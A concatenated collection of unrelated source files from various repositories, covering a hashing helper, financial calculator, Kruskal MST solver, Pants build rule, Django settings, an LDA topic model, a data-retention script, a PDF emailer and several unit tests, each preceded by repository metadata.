a58c8e03d06aea7b31bf57f64f371bdc88ac39f0 | f961397842d8952b68b9e02229d188b93b1e01ec | /Medium/Python/Chat Encyption/Hashing.py | b8b174be45cb6be7d18e431c367e5f97344a478c | [] | no_license | amrudesh1/Bios_Pentest_Task | 82a0a35b23a097c0c83432c8b3e3ae70b801666b | 2352a069a6a71914f1d857a34a1f5e91aebe5bec | refs/heads/master | 2023-02-25T15:52:25.541509 | 2021-01-29T21:46:30 | 2021-01-29T21:46:30 | 314,322,925 | 0 | 0 | null | 2021-01-29T21:46:31 | 2020-11-19T17:34:36 | Python | UTF-8 | Python | false | false | 373 | py | import hashlib
def check_message_authenticity(message, decodedHash):
return hashlib.sha512(message.encode('utf-8')).hexdigest() == decodedHash
class Hash:
def __init__(self, message=None, hash_value=None):
self.message = message
self.hash_value = hash_value
def digest_message(self):
return hashlib.sha512(self.message).hexdigest()
| [
"amrbal@gmail.com"
] | amrbal@gmail.com |
ac4e9a1ea0db7e90cc3cf5811236571156f9d628 | 98b1c2bf8c5914b8b26b793413c6c4829535896e | /future_value.py | 41b7deba067128d99d3bb5ead0c77b9ff32d8190 | [] | no_license | antosojan98/python_2016 | 20fa518b1aa02a6209b0210610e4d2363f54b32b | f490a80992fd613c0dc0a63e26ac8ec57abc1b65 | refs/heads/master | 2020-04-19T15:27:48.663658 | 2019-01-30T03:50:52 | 2019-01-30T03:50:52 | 168,275,106 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | # Get the desired future value.
future_value = float(input('Enter the desired future value: '))
# Get the annual interest rate.
rate = float(input('Enter the annual interest rate: '))
# Get the number of years that the money will appreciate.
years = int(input('Enter the number of years the money will grow: '))
# Calculate the amount needed to deposit.
present_value = future_value / (1.0 + rate)**years
# Display the amount needed to deposit.
print('You will need to deposit this amount:', present_value)
| [
"noreply@github.com"
] | antosojan98.noreply@github.com |
c0ae1a74b9dfc5d8261a68750e1af81da488d578 | 406ce23771eda2a64efcf41cce28a31e6c7ecd87 | /BOJ/1197.py | e4b5707bf9b2fff8674d1be559e89ce6902a4752 | [] | no_license | ypd01018/Algorithm | 53d22c9f30e9025af25401718066c73200a6bcb2 | 8382f3adb6f84620d929fcac128cc49fba2f7b6e | refs/heads/master | 2023-06-08T14:25:19.104589 | 2021-06-30T23:19:58 | 2021-06-30T23:19:58 | 324,764,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | import sys
import heapq
sys.setrecursionlimit(10000000);
root = [i for i in range(10010)];
pq = [];
def find(a) :
# print(' ' + str(a) + ',' + str(root[a]));
if(a == root[a]) : return a;
else :
root[a] = find(root[a]);
return root[a];
def uni(a,b) :
a = find(a);
b = find(b);
root[b] = a;
V, E = map(int, input().split())
for i in range(E) :
a,b,d = map(int, input().split());
heapq.heappush(pq,[d,a,b]);
answer = 0;
cnt = 0;
while(len(pq)>0) :
d,a,b = heapq.heappop(pq);
if(find(a) == find(b)) : continue;
answer += d;
cnt += 1;
uni(a,b);
if(cnt == V-1) : break;
print(answer);
| [
"ypd01018@naver.com"
] | ypd01018@naver.com |
68c8f33697bf9c82106bc90449fd5cc1849d5f0e | d2dfd89555fc12686c5ed348cb5dd81a2df9998e | /src/python/pants/backend/google_cloud_function/python/rules.py | 165f78d89a65c401aa1b76d395dedd2963518c55 | [
"Apache-2.0"
] | permissive | Eric-Arellano/pants | 01c8e50fec51768c6a40845479ebdef70d8f04b3 | 53a7665da8d49e440dc6d3a67b5a36024ed971a2 | refs/heads/main | 2023-06-27T15:38:13.506346 | 2023-06-20T12:25:23 | 2023-06-20T12:25:23 | 139,469,637 | 0 | 0 | Apache-2.0 | 2023-05-31T11:06:47 | 2018-07-02T16:48:31 | Python | UTF-8 | Python | false | false | 3,887 | py | # Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import logging
from dataclasses import dataclass
from pants.backend.google_cloud_function.python.target_types import (
PythonGoogleCloudFunction,
PythonGoogleCloudFunctionHandlerField,
PythonGoogleCloudFunctionRuntime,
PythonGoogleCloudFunctionType,
)
from pants.backend.python.subsystems.lambdex import Lambdex, LambdexLayout
from pants.backend.python.util_rules.faas import (
BuildLambdexRequest,
BuildPythonFaaSRequest,
PythonFaaSCompletePlatforms,
)
from pants.backend.python.util_rules.faas import rules as faas_rules
from pants.core.goals.package import BuiltPackage, OutputPathField, PackageFieldSet
from pants.core.util_rules.environments import EnvironmentField
from pants.engine.rules import Get, collect_rules, rule
from pants.engine.unions import UnionRule
from pants.util.logging import LogLevel
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class PythonGoogleCloudFunctionFieldSet(PackageFieldSet):
required_fields = (PythonGoogleCloudFunctionHandlerField,)
handler: PythonGoogleCloudFunctionHandlerField
runtime: PythonGoogleCloudFunctionRuntime
complete_platforms: PythonFaaSCompletePlatforms
type: PythonGoogleCloudFunctionType
output_path: OutputPathField
environment: EnvironmentField
@rule(desc="Create Python Google Cloud Function", level=LogLevel.DEBUG)
async def package_python_google_cloud_function(
field_set: PythonGoogleCloudFunctionFieldSet,
lambdex: Lambdex,
) -> BuiltPackage:
if lambdex.layout is LambdexLayout.LAMBDEX:
return await Get(
BuiltPackage,
BuildLambdexRequest(
address=field_set.address,
target_name=PythonGoogleCloudFunction.alias,
complete_platforms=field_set.complete_platforms,
runtime=field_set.runtime,
handler=field_set.handler,
output_path=field_set.output_path,
include_requirements=True,
# The GCP-facing handler function is always `main.handler` (We pass `-M main.py -H handler` to
# Lambdex to ensure this), which is the wrapper injected by Lambdex that manages invocation of
# the actual user-supplied handler function. This arrangement works well since GCF assumes the
# handler function is housed in `main.py` in the root of the zip (you can re-direct this by
# setting a `GOOGLE_FUNCTION_SOURCE` Google Cloud build environment variable; e.g.:
# `gcloud functions deploy {--build-env-vars-file,--set-build-env-vars}`, but it's non-trivial
# to do this right or with intended effect) and the handler name you configure GCF with is just
# the unqualified function name, which we log here.
script_handler="handler",
script_module="main.py",
handler_log_message="handler",
),
)
return await Get(
BuiltPackage,
BuildPythonFaaSRequest(
address=field_set.address,
target_name=PythonGoogleCloudFunction.alias,
complete_platforms=field_set.complete_platforms,
runtime=field_set.runtime,
handler=field_set.handler,
output_path=field_set.output_path,
include_requirements=True,
include_sources=True,
reexported_handler_module=PythonGoogleCloudFunctionHandlerField.reexported_handler_module,
log_only_reexported_handler_func=True,
),
)
def rules():
    """Expose this backend's rules and union registrations to the engine."""
    registered = list(collect_rules())
    registered.append(UnionRule(PackageFieldSet, PythonGoogleCloudFunctionFieldSet))
    registered.extend(faas_rules())
    return registered
| [
"noreply@github.com"
] | Eric-Arellano.noreply@github.com |
c62cfe65517658f463f145d395741f69f45538a0 | c2322827160b38bedc7bb40558108aaf12fa67b4 | /blog_project/mysite/mysite/settings.py | afc0189ea6c58a9e04ac0f2a35cb495036080b05 | [] | no_license | lalitkoli11121998/django-project | a1dd74b000980d27ed970e02f5970c1575ed5a6c | beb0d4f5ea96cbdf7f08e089eaed3d12c6c29434 | refs/heads/master | 2023-03-19T06:01:55.830195 | 2021-03-14T19:29:26 | 2021-03-14T19:29:26 | 346,740,522 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,227 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Extra template search path for the blog app (also listed in TEMPLATES below).
TEMPLATE_DIR = os.path.join(BASE_DIR,'blog/templates/blog')

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load it
# from the environment before any public deployment.
SECRET_KEY = 'iu#*%$eyumke!(3du%vh#ve9y)nn#uyh6t3dpd)6v%rh-u%)e0'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog'  # project-local blog application
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'mysite.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [TEMPLATE_DIR,],  # blog templates live outside app dirs
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'mysite.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# Development default: file-based SQLite in the project root.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
LOGIN_REDIRECT_URL = '/' | [
"lalitkoli11121998@gmail.com"
] | lalitkoli11121998@gmail.com |
e1cc5bc11abd94186843e7fc04694c43421d7da3 | e871503f786f565b418a6dc9513e07d3d16bfa65 | /deco2.py | 9666f4661dfed068f15e55cfa92d136c20b2f30c | [] | no_license | JoJoJoJoJoJoJo/MyLearning | 103cc082244e15de6679670bee82e3c78863d5d5 | 9411d78618e91e87e3a12f015706bab2babb4338 | refs/heads/master | 2020-06-29T07:07:59.763022 | 2018-08-07T11:16:31 | 2018-08-07T11:16:31 | 74,441,430 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 730 | py | import functools
def log(text):
    """Logging decorator usable both bare (@log) and parameterized (@log("tag")).

    When *text* is not callable it is treated as a message prefix and a
    parameterized decorator is returned; when it is callable, `log` was
    applied directly to a function and the wrapper is returned immediately.

    Python-2 era module: the print statements are kept in the
    single-argument parenthesized form, which behaves identically under
    Python 2 and Python 3.
    """
    if not callable(text):  # used as @log("tag"): text is the prefix string
        def dec(func):
            @functools.wraps(func)
            def wrapper(*args, **kw):
                print("%s,begin call %s()" % (text, func.__name__))
                result = func(*args, **kw)
                print("End call")
                return result
            return wrapper
        return dec
    else:
        @functools.wraps(text)  # now text is a func
        def wrapper(*args, **kw):
            print("begin call %s()" % text.__name__)
            result = text(*args, **kw)
            print("End call")
            return result
        return wrapper
@log("input")
def fx(t=None):
    """Print *t*; decorated with a tagged log wrapper."""
    # Parenthesized single-argument print is identical in Python 2 and 3.
    print(t)
@log
def fy(x=None):
    """Print *x*; decorated with the bare log wrapper."""
    # Parenthesized single-argument print is identical in Python 2 and 3.
    print(x)
| [
"whr428@163.com"
] | whr428@163.com |
f10a0da37c00006c384788f1ec4d03fc2887a638 | 585a2597ce8e68e0b21568fe8f0a5ed6d1ac50a8 | /topicModelLDA.py | a6b3f8247755b4c5d2b240d562c6400b7185c122 | [] | no_license | UberHowley/mooc-file-processing | c379a09b78afa5c0609582f09dab15c9cf6a1ad8 | f06b356e21a56c5f9353965a69a5978e91c8c992 | refs/heads/master | 2021-01-17T14:07:22.593606 | 2017-04-06T23:25:58 | 2017-04-06T23:25:58 | 33,063,954 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,547 | py | __author__ = 'IH'
__project__ = 'processMOOC'
import re
from html.parser import HTMLParser
from stop_words import get_stop_words
from gensim import corpora, models
class LDAtopicModel(object):
    """
    Class contains an LDA topic model for one set of documents.
    Mostly exists as a way to access (and setup) topic_names.

    Fix: `docs`, `topic_names` and `lda` used to be mutable *class*
    attributes, so every instance shared (and appended to) the same
    topic-name list.  They are now initialized per instance.
    """
    # Class-level defaults kept for backward compatibility with any code
    # that reads them off the class; instances shadow them in __init__.
    number_of_topics = 1
    docs = []
    topic_names = []
    lda = None
    FORMAT_LINE = "--------------------"

    def __init__(self, nt, docs_as_bow):
        """
        Initialize class with documents to train the model on
        :param nt: number of topics to fit
        :param docs_as_bow: a list of text documents as bags of words
        :return: None
        """
        self.docs = docs_as_bow
        self.number_of_topics = nt
        self.topic_names = []  # per-instance, filled interactively in create_lda()
        self.lda = None
        self.create_lda()

    def create_lda(self):
        """
        Runs all posts through an LDA topic model, to determine the basic topic of the post.
        Interactively prompts the user (via input()) to name each fitted topic.
        http://chrisstrelioff.ws/sandbox/2014/11/13/getting_started_with_latent_dirichlet_allocation_in_python.html
        http://radimrehurek.com/topic_modeling_tutorial/2%20-%20Topic%20Modeling.html
        :return: None
        """
        print("Creating LDA topic model from " + str(len(self.docs)) + " documents.")
        num_topics = self.number_of_topics
        chunk_size = int(len(self.docs)/100)
        if chunk_size < 1:
            chunk_size = 1 # small number of sentences
        all_tokens = sum(self.docs, [])
        # process our stop words like all our words have been processed
        tokens_stop = []
        for word in get_stop_words('en'):
            tokens_stop.extend(self.to_bow(word))
        # Counter gives O(n) frequency counts; the previous
        # `all_tokens.count(word)` inside a comprehension was O(n^2).
        from collections import Counter  # local import: keeps module imports untouched
        token_counts = Counter(all_tokens)
        tokens_once = set(word for word, count in token_counts.items() if count == 1)
        # remove words that appear only once or are stop words
        texts = [[word for word in sentence if word not in tokens_once and word not in tokens_stop] for sentence in self.docs]
        # constructing topic model
        dict_lda = corpora.Dictionary(texts)
        mm_corpus = [dict_lda.doc2bow(text) for text in texts]
        self.lda = models.ldamodel.LdaModel(corpus=mm_corpus, id2word=dict_lda, num_topics=num_topics, update_every=1, chunksize=chunk_size, passes=1)
        # printing each topic
        print(self.FORMAT_LINE)
        for topic in self.lda.print_topics(self.number_of_topics):
            print(topic)
        print(self.FORMAT_LINE)
        print("\n")
        print("- Begin naming topics -")
        # naming each topic interactively
        i = 1
        for topic in self.lda.print_topics(self.number_of_topics):
            print("\t(" + str(i) + ") "+ topic)
            self.topic_names.append(input("> A name for topic (" + str(i) + "): "))
            i += 1
        print("Done creating LDA topic model")

    def predict_topic(self, document):
        """
        Predict the most likely topic for the given document
        :param document: the string to predict the topic for
        :return: the string topic name
        """
        if self.lda is None:
            # NOTE(review): execution still falls through and raises on the
            # next line when self.lda is None; kept as-is so callers relying
            # on the exception are unaffected.
            print("ERROR in lda_topic_model.predict_topic(): Need to create_lda() before predicting topics.")
        dict_lda = getattr(self.lda, 'id2word')
        lda_vector = self.lda[dict_lda.doc2bow(self.to_bow(document))]
        # lda_vector is (topic_id, probability) pairs; pick the max-probability topic.
        return self.topic_names[max(lda_vector, key=lambda item: item[1])[0]]

    @staticmethod
    def clean_string(sentence):
        """
        Clean the string by removing all punctuation and HTML
        http://stackoverflow.com/questions/753052/strip-html-from-strings-in-python
        :param sentence: the string potentially containing HTML and other non-alphanumerics
        :return: the cleaned, lower-cased string
        """
        # TODO: Should removed characters be replaced with a space? Or no space (as is)?
        removed_char = ''
        s = MLStripper()
        s.feed(sentence)
        no_html = s.get_data()
        # MLStripper returns almost nothing for plain (HTML-free) text in some
        # cases; fall back to the raw sentence when the result looks empty.
        if len(no_html) < 10:
            no_html = sentence
        # Remove "'s" possession contractions
        cleaned = no_html.replace("'s", removed_char)
        cleaned = re.sub(r'[^a-zA-Z\' ]+', removed_char, cleaned) # Leaving in letters and apostrophes
        # Handling URLs by splitting the 'http' off from the rest of the URL ('httplightsidelabscomwhatresearch')
        cleaned = cleaned.replace("http", "http ")
        return cleaned.lower()

    @staticmethod
    def to_bow(sentence):
        """
        Turn given string into a bag of words
        :param sentence: the string to turn into a list
        :return: the string as a list of strings (bag of words)
        """
        texts = [word for word in sentence.split()] # turning each word into an item in a list
        return texts
class MLStripper(HTMLParser):
    """HTML parser that keeps only text content, discarding all tags.

    Feed markup with ``feed()``; retrieve the stripped text via ``get_data()``.
    """

    def __init__(self):
        super().__init__()
        self.reset()
        self.strict = False
        self.convert_charrefs = True
        # Text fragments accumulate here in document order.
        self.fed = []

    def handle_data(self, data):
        # Called by HTMLParser for each run of character data between tags.
        self.fed.append(data)

    def get_data(self):
        # Join the collected fragments into the tag-free text.
        return "".join(self.fed)
| [
"ihowley@gmail.com"
] | ihowley@gmail.com |
0aa7fe20a08fff787e23337e2dadcb9e8ce74529 | ac36de7b156d726de4900784df5766b7e5582ccb | /bin/housekeeping.py | 8acae01ca3aa199739bcf05897ab37866ba924d7 | [
"Apache-2.0"
] | permissive | gunny26/datalogger4 | 4c92b4305432317aa94680a99e0a2db65de87181 | ab1b6bd295e41f57530a9f1c0977f5dcd1eabf2a | refs/heads/master | 2022-04-16T13:06:35.265474 | 2020-04-14T20:45:33 | 2020-04-14T20:45:33 | 255,380,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,656 | py | #!/usr/bin/python3
import sys
import os
import datetime
import shutil
import logging
import argparse
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s : %(message)s")
def main(archive_dir, data_dir, back, force=None):
    """Purge dated (YYYY-MM-DD) subdirectories past their retention window.

    Analyzed data under *data_dir* older than *back* days is removed;
    archived raw input under *archive_dir* is kept twice as long.

    :param force: actually delete when True, only log when False.  When None
        it falls back to the module-level argparse namespace ``args`` —
        the original implementation read ``args.force`` from global scope
        inside the nested loop, which made the function untestable in
        isolation.
    """
    if force is None:
        force = args.force  # backward-compatible script behavior

    def inner(directory, oldest):
        # ISO date strings sort chronologically, so a plain string compare
        # against *oldest* identifies expired directories.
        for filename in sorted(os.listdir(directory)):
            if len(filename) != 10 or len(filename.split("-")) != 3:
                logging.error("skipping non datestring directory %s", filename)
                continue
            if filename < oldest:
                absfilename = os.path.join(directory, filename)
                if os.path.isdir(absfilename):
                    assert absfilename != directory
                    if not force:
                        logging.info("would delete subdirectory %s, use -f to do it", absfilename)
                    else:
                        logging.info("deleting subdirectory %s", absfilename)
                        shutil.rmtree(absfilename)

    now = datetime.date.today()
    oldest = (now - datetime.timedelta(days=back)).isoformat()
    logging.info("deleting analyzed data older than %s", oldest)
    inner(data_dir, oldest)
    # Archived raw input is retained twice as long as analyzed data.
    oldest = (now - datetime.timedelta(days=back * 2)).isoformat()
    logging.info("deleting archived raw input data older than %s", oldest)
    inner(archive_dir, oldest)
if __name__ == "__main__":
    # Production default locations; overridable on the command line.
    archive_dir = "/srv/raw-archiv/datalogger_raw_archiv/"
    data_dir = "/srv/data"
    parser = argparse.ArgumentParser(description='deleting old data')
    parser.add_argument('--archive-dir', default=archive_dir, help="basedirectory of archived raw_data: %(default)s")
    parser.add_argument('--data-dir', default=data_dir, help="basedirectory of archived raw_data: %(default)s")
    parser.add_argument("-b", '--back', default=400, type=int, help="online data older than --back days will be purged, and archived raw data older than 2 * this value")
    parser.add_argument("-f", '--force', action='store_true', help="force the deletion, otherwise only show what will be done")
    parser.add_argument("-q", '--quiet', action='store_true', help="set to loglevel ERROR")
    parser.add_argument("-v", '--verbose', action='store_true', help="set to loglevel DEBUG")
    # NOTE: `args` is also read by main() (dry-run check), so it must stay
    # at module scope under this name.
    args = parser.parse_args()
    if args.quiet is True:
        logging.getLogger("").setLevel(logging.ERROR)
    if args.verbose is True:
        logging.getLogger("").setLevel(logging.DEBUG)
    logging.debug(args)
    if not args.force:
        # Without -f the run is a dry run: deletions are only logged.
        logging.error("-f is not set, so only displaying what would be done")
main(args.archive_dir, args.data_dir, args.back)
| [
"arthur.messner@tirol-kliniken.at"
] | arthur.messner@tirol-kliniken.at |
b5612e469ab15c7cfa726e1f6d7ef51c8a9253ec | fe4073028c22079c9908bba9d1f558256b3d3a73 | /app.py | d3eb02e6315a5462f6f5a86462442f07596f4069 | [] | no_license | romanannaev/BlogFlaskFinish | fb35c8fbe3a77753f0664641215cc44f4617b98f | 3aaecab0b1c3694aa584229963d7c521a301c33e | refs/heads/master | 2021-10-22T08:45:07.250060 | 2020-01-08T14:29:54 | 2020-01-08T14:29:54 | 231,746,001 | 0 | 0 | null | 2021-03-20T02:37:58 | 2020-01-04T10:37:40 | Python | UTF-8 | Python | false | false | 2,169 | py | import os
from flask import Flask, request
from flask_sqlalchemy import SQLAlchemy
#create admin
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
#flask security, the storage of users, roles
from flask_security import SQLAlchemyUserDatastore
from flask_security import Security
# Module-level Flask application, configured from the settings class named
# by the APP_SETTINGS environment variable.
app = Flask(__name__)
app.config.from_object(os.environ['APP_SETTINGS'])
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)

# Imported for side effects: presumably registers routes on `app`
# (confirm in view.py).
import view
from posts.blueprint import posts
app.register_blueprint(posts, url_prefix='/blog')  # mount the posts blueprint under /blog

### Admin ####
from models import *
# Integration of Flask-Admin with Flask-Security (role-based access below).
from flask_security import current_user
from flask import redirect, url_for, request
class AdminMixin:
    """Restricts Flask-Admin views to users holding the 'admin' role."""
    def is_accessible(self):
        # Flask-Admin consults this before serving any protected view.
        return current_user.has_role('admin')
    def inaccessible_callback(self, name, **kwargs):
        # Unauthorized users are redirected to the Flask-Security login page;
        # `next` returns them to the originally requested admin URL.
        return redirect(url_for('security.login', next=request.url))
# Base model view that regenerates the slug whenever a model instance is
# created or edited from the admin panel.
class BaseModelView(ModelView):
    def on_model_change(self, form, model , is_created):
        model.generate_slug()
        return super(BaseModelView, self).on_model_change(form, model, is_created)
# Role-protected admin views for the Post and Tag models.
class AdminView(AdminMixin, ModelView):
    pass
# Role-protected admin index page (the panel's landing view).
from flask_admin import AdminIndexView
class HomeAdminView(AdminMixin, AdminIndexView):
    pass
class PostAdminView(AdminMixin, BaseModelView):
    # Fields exposed on the Post create/edit form.
    form_columns = ['title', 'body', 'tags', 'image']
class TagAdminView(AdminMixin, BaseModelView):
    form_columns = ['name', 'posts']

# Mount the admin panel at the site root with the protected index view.
admin = Admin(app, 'FlaskApp', url='/', index_view=HomeAdminView(name='Home'))
admin.add_view(PostAdminView(Post, db.session))  # was plain ModelView; PostAdminView adds auth + slug handling
admin.add_view(TagAdminView(Tag, db.session))

## flask security ##
# Wire Flask-Security to the SQLAlchemy-backed User/Role models.
user_datastore = SQLAlchemyUserDatastore(db, User, Role)
security = Security(app, user_datastore)
if __name__ == '__main__':
app.run() | [
"romanannaev1992@gmail.com"
] | romanannaev1992@gmail.com |
d15f20cb57d710606567750e55850e68d835261d | c4a8cb8e7a34b088c5780b5abaa2bf33172a8c67 | /email_pdf.py | ca930831f9a91218ae8e8f8699edf19aaa1ca4b5 | [] | no_license | jeffwheeler/scan2present | ff94e49fccd1850c828f6e7bc1944db4016d0180 | 0bdc8ae7137b07480f235016cf04a913c1290f96 | refs/heads/master | 2020-06-05T07:07:49.140155 | 2014-03-15T09:31:55 | 2014-03-15T09:31:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | import smtplib
from email.MIMEBase import MIMEBase
from email.MIMEMultipart import MIMEMultipart
from email import Encoders
SERVER_EMAIL = 'jeffwheeler@stanford.edu'
def send_pdf(to_addr=SERVER_EMAIL):
    """Email ./tikz_gen/slides.pdf as an attachment to *to_addr*.

    *to_addr* now defaults to the server's own mailbox, which makes the
    module's bare ``send_pdf()`` invocation valid (it previously raised
    TypeError).  The PDF file handle is closed via a context manager and
    the SMTP connection is always quit, even if sendmail fails.
    """
    message = MIMEMultipart()
    message['Subject'] = 'Your PDF'
    message['From'] = SERVER_EMAIL
    message['To'] = to_addr

    pdf = MIMEBase('application', 'pdf')
    # `with` closes the file even when read() raises (was leaked before).
    with open('./tikz_gen/slides.pdf', 'rb') as fp:
        pdf.set_payload(fp.read())
    Encoders.encode_base64(pdf)
    pdf.add_header('Content-Disposition', 'attachment', filename='slides.pdf')
    message.attach(pdf)

    s = smtplib.SMTP('localhost')
    try:
        s.sendmail(SERVER_EMAIL, to_addr, message.as_string())
    finally:
        s.quit()
if __name__ == '__main__':
    # Bug fix: send_pdf takes a required recipient address; the bare
    # send_pdf() call raised TypeError.  Default to the server's mailbox.
    send_pdf(SERVER_EMAIL)
| [
"jeffwheeler@gmail.com"
] | jeffwheeler@gmail.com |
c09b49731c933af584b62a2ca38a073aaa19b713 | 92028014dd9d3cc4a24e933147bdfe70ebb51cae | /tests/test_hand.py | 9d75bbc9f146996a325b7e95a9b792d5054535c3 | [] | no_license | nualagr/poker | b0d87a5e17057303b358eee87da43fdae8fd12bf | 75ed648a2f77e7ebda245d240ba5d1a02a140462 | refs/heads/master | 2023-08-22T04:42:01.842610 | 2021-09-29T14:30:47 | 2021-09-29T14:30:47 | 398,568,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,516 | py | import unittest
from poker.card import Card
from poker.hand import Hand
from poker.validators import PairValidator
class HandTest(unittest.TestCase):
    """Unit tests for poker.hand.Hand."""

    def test_starts_out_with_no_cards(self):
        hand = Hand()
        self.assertEqual(hand.cards, [])

    def test_shows_all_its_cards_in_technical_representation(self):
        # repr() lists the cards; the order differs from insertion order,
        # so add_cards apparently sorts the hand (see next test) — behavior
        # defined in poker.hand.
        cards = [Card(rank="Ace", suit="Clubs"), Card(rank="3", suit="Spades")]
        hand = Hand()
        hand.add_cards(cards)
        self.assertEqual(repr(hand), "3 of Spades, Ace of Clubs")

    def test_receives_and_stores_cards(self):
        # Cards added high-first are stored low-first: add_cards orders the
        # hand (6 before Ace).
        ace_of_spades = Card(rank="Ace", suit="Spades")
        six_of_clubs = Card(rank="6", suit="Clubs")
        cards = [ace_of_spades, six_of_clubs]
        hand = Hand()
        hand.add_cards(cards)
        self.assertEqual(hand.cards, [six_of_clubs, ace_of_spades])

    def test_interacts_with_validator_to_get_winning_hand(self):
        class HandWithOneValidator(Hand):
            # Override the SuperClass VALIDATORS attribute
            # to be a tuple of one. This is enough to test the
            # 'best_rank' method.
            VALIDATORS = (PairValidator,)
        ace_of_hearts = Card(rank="Ace", suit="Hearts")
        ace_of_spades = Card(rank="Ace", suit="Spades")
        cards = [
            ace_of_hearts,
            ace_of_spades,
        ]
        hand = HandWithOneValidator()
        hand.add_cards(cards=cards)
        # best_rank() yields (validator_index, hand_name, winning_cards).
        self.assertEqual(hand.best_rank(), (0, "Pair", [ace_of_hearts, ace_of_spades]))
| [
"nualagreenwood@gmail.com"
] | nualagreenwood@gmail.com |
b2181662bb9fd4692be62048034418cbbcd3c91a | 63be7bc696aa5ac51d55b35854dfaf2eac3470c6 | /tests/test_backup_list.py | 3a9b63aa77bec543b01cd3c3245af54aa6b4d0cd | [
"MIT"
] | permissive | sabidib/pytest-redis | 6c10c40b0389dabbcfed49d15df70beeca873def | 26f5aa1e4590dee942bac44eea7ea3f8ff544f67 | refs/heads/master | 2021-01-21T14:44:19.433845 | 2016-05-26T13:45:50 | 2016-05-26T13:45:50 | 58,546,090 | 0 | 1 | null | 2016-05-26T13:45:50 | 2016-05-11T13:13:12 | Python | UTF-8 | Python | false | false | 2,296 | py | """Tests the pytest-redis backup list arguments."""
import utils
def create_test_file(testdir):
    """Create test file and return array of paths to tests.

    Writes a module containing two trivially passing tests into *testdir*
    (a pytest ``testdir`` fixture) and returns their pytest node ids,
    e.g. ``test_file.py::test_exists``.
    """
    test_filename = "test_file.py"
    # The literal below is written verbatim into the generated test module.
    test_filename_contents = """
def test_exists():
    assert True
def test_does_exist():
    assert True
"""
    utils.create_test_file(testdir, test_filename, test_filename_contents)
    return [test_filename + "::test_exists", test_filename +
            "::test_does_exist"]
def get_args_for_backup_list(redis_args, backup_list_key):
    """Build the pytest CLI arguments used by the backup-list tests."""
    extra_args = ["-s", "--redis-backup-list-key=" + backup_list_key]
    return utils.get_standard_args(redis_args) + extra_args
def test_run_back_up_test(testdir, redis_connection,
                          redis_args):
    """Ensure that the backup list is filled with tests."""
    # Two generated node ids, e.g. "test_file.py::test_exists".
    file_paths_to_test = create_test_file(testdir)
    back_up_list = redis_args["redis-backup-list-key"]
    py_test_args = get_args_for_backup_list(redis_args, back_up_list)
    # Seed the backup list directly, as if a previous run had populated it.
    for a_file in file_paths_to_test:
        redis_connection.lpush(back_up_list,
                               a_file)
    testdir.runpytest(*py_test_args)
    # After the run the backup list still holds both node ids in original
    # order (lpush reverses, rpop restores the order).
    assert redis_connection.llen(back_up_list) == 2
    for a_file in file_paths_to_test:
        assert redis_connection.rpop(back_up_list) == a_file
def test_run_tests_multiple_times_with_backup(testdir, redis_connection,
                                              redis_args):
    """Run a test multiple times to ensure backup list is used.

    The work queue is seeded only once; every subsequent run must recover
    the test node ids from the backup list.
    """
    file_paths_to_test = create_test_file(testdir)
    back_up_list = redis_args["redis-backup-list-key"]
